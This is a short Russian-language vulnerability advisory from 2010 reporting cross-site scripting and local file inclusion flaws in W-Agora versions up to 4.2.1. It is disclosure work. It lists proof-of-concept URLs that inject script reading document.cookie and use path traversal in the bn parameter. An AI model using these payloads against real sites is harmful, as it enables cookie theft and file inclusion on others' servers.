Новые уязвимости в W-Agora

2010-10-28T00:00:00
ID SECURITYVULNS:DOC:24989
Type securityvulns
Reporter Securityvulns
Modified 2010-10-28T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Cross-Site Scripting и Local File Inclusion уязвимостях в W-Agora.

XSS (WASC-08):

http://site/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

http://site/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уязвимость работает в версии 4.1.5, но не работает в 4.2.1.

http://site/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion (WASC-31):

Можно инклюдить php-файлы (с расширением php3 в версии W-Agora 4.1.5 или с расширением php в версии 4.2.1).

В папке conf:

http://site/news/for-print.php3?bn=1

http://site/news/login.php3?bn=1

В любой папке (только на Windows-серверах):

http://site/news/for-print.php3?bn=..\1

http://site/news/login.php3?bn=..\1

Уязвимы W-Agora 4.2.1 и предыдущие версии. В последних версиях системы скрипты php3 имеют расширение php.

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/4484/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua